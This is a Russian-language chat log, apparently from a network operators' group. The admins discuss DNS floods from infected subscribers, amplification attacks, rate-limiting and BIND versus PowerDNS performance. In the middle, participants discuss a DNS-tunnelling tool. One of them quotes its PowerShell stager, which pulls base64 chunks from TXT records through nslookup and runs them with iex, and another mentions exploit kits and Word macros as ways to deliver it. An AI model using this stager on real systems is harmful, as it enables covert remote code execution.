ви таки не поверите: вирусня ддосит адски. я вон днс долго пилил чтоб он не падал.

кого ддосит?

кого-то снаружи через бордер :D

кого ддосит?

к примеру провайдера

кого-то снаружи через бордер :D

и это то же

к примеру провайдера

всмысле все разом шлюз пингуют?

ви таки не поверите: вирусня ддосит адски. я вон днс долго пилил чтоб он не падал.

хсм тоесть если много запросо к днс провайдера,то бан,оригинально

всмысле все разом шлюз пингуют?

в смысле если днс - то вирус на компе пользователя пытается то dna amplification attack устроить то еще чего

в смысле если днс - то вирус на компе пользователя пытается то dna amplification attack устроить то еще чего

на шлюз?

на кого амплификейшон?

на шлюз?

http://whatis.techtarget.com/definition/DNS-amplification-attack

да я знаю что такое амплификейшон

атака на кого?

да хоть на кого. на ник ру недавно была

это ботсеть

сидишь такой и видишь как сабскрайбер 6000 запросов херачит

1... 2... 20... ой - днс тупит.. ой заббикс завизжал.. о! Бан сработал - полегчало...

чёт тут намешено куча всего, куча сессий, амплификейшон, бот сеть

это спросили просто кого от чего защищают

уязвимый днс, например те что на роутерах стоят не обязательно должны быть частью бот сетей

а если они часть, то там не обязательно днс-амплификейшон, там что угодно можно, хоть син-флуд, хоть тупо канал забивать одной сессией

уязвимый днс, например те что на роутерах стоят не обязательно должны быть частью бот сетей

кстати! Молодец Антон! По умолчанию на говнотике днс открыт!!!

а если они часть, то там не обязательно днс-амплификейшон, там что угодно можно, хоть син-флуд, хоть тупо канал забивать одной сессией

я привел просто примеры. смысл один - я ограничиваю сессии пользователей в сторону DNS.

кто нить понял, что там за скрипт, который повершел через днс запросы выполняет?

какая-то бредятина

подробнее?

зачем выполнять повершел на компе, на котором уже питон есть

ну последняя новость на линкмиап канале

а - ща схожу

ну последняя новость на линкмиап канале

ссылачку

Пятница на дворе и хочется чего-то такого этакого. И в качестве этакого сегодня выступает старая шутка про перебор двигателя через выхлопную трубу. А именно: как с помощью питона пропихнуть powershell скрипт используя DNS туннель. Некоторые судари явно знают толк… Главный признак гениальности – простота, наличествует, ибо скрипт дуболомен до прекрасного. Нарезаем скрипт на кусочки по 250 символов, распихиваем в TXT записи, целевая машина начинает запрашивать TXT записи и вуаля! Всем разобраться как работает и доложить Наташе. Там сотни строчек нет, а Наташа будет рада за взрощённых питонщиков. https://github.com/mdsecactivebreach/PowerDNS

их обычно тут удаляют

https://t.me/linkmeup_podcast

ну поглядел... ничего нового....

я помню как any от клиентов закрывал

ну на винде нет питону из коробке

на софт-fw бывает

ну я скрипт не смотрел

хсм тоесть если много запросо к днс провайдера,то бан,оригинально

нормально, таких ддосеров не так и много, вполне себе отделяются организации, где много запросов от флудеров

у нас это было настолько бедой - что юзерам выдавали гугловские днсы

зачем выполнять повершел на компе, на котором уже питон есть

этот скрипт серверный а на жертву загрузчик попадает другим способом,этот скрипт просто режет полезную нагрузку и загружает dns txt

ну я и говорю

зачем нужен павершел?

можно же так же на питоне выполнять

вообще, настраивалось так - fail2ban как индикатор, отсекалось на BRAS'е аклом, оповещался колл центр, он звонил абоненту и отправлял письмо о проблеме

ещё и скапи залупили

он же будет вместе с отновным dns replay ещё и icmp unreacheble отправлять

че для питона нету днс сервера нормального?

ну или просто сокет голый

ну я и говорю

ты скрипт читал? скрипт выполняеться на машине атакующего чтобы загрузить повешелл скрипт для жертвы,которая его потом скачает

ну я таких в дроп молча. превысил - начались дропы. если совсем дропы - у абона нихера не робит - он звонит и пищит.

только пока не приделано оповещение КЦ. там в црм надо писать. а я не программист

ты скрипт читал? скрипт выполняеться на машине атакующего чтобы загрузить повешелл скрипт для жертвы,которая его потом скачает

а как скачает то?

че для питона нету днс сервера нормального?

ааа,ну это недостаток знаний

ну я таких в дроп молча. превысил - начались дропы. если совсем дропы - у абона нихера не робит - он звонит и пищит.

а тут ему звонят - "Уймись, упырь, напишем в органы соответствующие за вредительство сетевое"

а тут ему звонят - "Уймись, упырь, напишем в органы соответствующие за вредительство сетевое"

да как же... звонили. он нахер посылает: типа у меня пашет и неепет. а щас проще)

да и некогда нам звонить... много их.. а как выйдет какое говно....

а как скачает то?

вот так "for ($i=1;$i -le %s;$i++){$b64+=iex(nslookup -q=txt -timeout=3 $i'.%s')[-1]};iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64))))" % (str(len(chunks)), domain)

да как же... звонили. он нахер посылает: типа у меня пашет и неепет. а щас проще)

отсечку то от днс он получает полную, вообще никуда стукнуть не может

10 минут

вот так "for ($i=1;$i -le %s;$i++){$b64+=iex(nslookup -q=txt -timeout=3 $i'.%s')[-1]};iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64))))" % (str(len(chunks)), domain)

ну и как эту строчку запустить у жертвы?

отсечку то от днс он получает полную, вообще никуда стукнуть не может

нет. дропы. просто выше лимита все в дроп

ну и как эту строчку запустить у жертвы?

ну тут куча вариантов от эксплоит китов до макросов в ворде

тут года полтора назад вконтактик амплифаерили, вот пришлось сделать

ERROR: S client not available

я помню как бинды валились.. потом восьмерки поставил товарищ-админ. народ ныл - все тупит. там 40мс отклик.. потом он уволился и меня допустили до сети) и я поверднс-рекурсор курить начал.

тут года полтора назад вконтактик амплифаерили, вот пришлось сделать

вк сам ддосит используя своих юзеров

бинды норм тащат, что их менять?

на старых машинках еще и лучше чем повер

бинды норм тащат, что их менять?

год назад при 50К сабскрайберов этот биндовый сервер падал.... быстро

может донастроить нужно было

ну тут чужое хозяйство, каждый сам себе молоток по руке выбирает

может донастроить нужно было

да там как не строй... точнее не падал: тупил. Адски! а рекурсор работает - оччень редко когда на 5 минут притупит до 40МС и все

на авторитарниках - отлично пашут!

может и бинды конечно.. я попробую - но шеф меня отговаривал от такого занятия

на стенде поиграйся просто, нет там существенной разницы в скорости

повер мне не понравлся тем, что при пиковой нагрузке тупо встает и все

а бинд меееееедлееееенноооо отвечает

у меня повер ни разу не вставал

вот бинд и отвечал

мееедленно

Может пора делать кластер из биндов :) Мне советовали Gentoo+Bind для быстрых откликов. На сайте рейтинга с тестами, связка Gentoo+Bind была на 1 месте.

https://indico.dns-oarc.net/event/8/contribution/5/material/slides/0.ppt

Эммм... а год-то тестов какой? Может всё уже давно поменялось...

да ну, разве что-то могло с 2007 года в IT поменяться? чушь

Эммм... а год-то тестов какой? Может всё уже давно поменялось...

Я узнал о рейтингах от Михаила Варакина в 2011г на кусах Специалист при МГТУ им. Баумана. Может у него есть данные свежее. М. Варакин сейчас курс ведет интересный с: Ansible, Zabbix, Git и контейнерами Linux http://miaton.ru/course/linux-dlya-windows-administratora-uroven-2 В компании держали сайт на Gentoo (nginx+MySQL+чат, + .., + .., +.., + ..), но сайт - это много компонент, а вот Bind проще как-то звучит. И кстати забили на Gentoo и переделали всё на Debian. Gentoo - компиляй, компиляй, компиляй.

Эммм... а год-то тестов какой? Может всё уже давно поменялось...

Можно ещё самим рассчитать производительность сервера с Bind(-ом), если данные о сервере взять с cайта http://www.spec.org/benchmarks.html#cpu Скажем, подобрать сервер.

Я узнал о рейтингах от Михаила Варакина в 2011г на кусах Специалист при МГТУ им. Баумана. Может у него есть данные свежее. М. Варакин сейчас курс ведет интересный с: Ansible, Zabbix, Git и контейнерами Linux http://miaton.ru/course/linux-dlya-windows-administratora-uroven-2 В компании держали сайт на Gentoo (nginx+MySQL+чат, + .., + .., +.., + ..), но сайт - это много компонент, а вот Bind проще как-то звучит. И кстати забили на Gentoo и переделали всё на Debian. Gentoo - компиляй, компиляй, компиляй.

Зачётный препод.

Коллеги, у кого есть датацентры с evpn/vxlan???

Интересует что используете для overlay/underlay: ebgp/ebgp, ebgp/ibgp, igp/ibgp...

а у тебя какие свичи и облако?

Свичи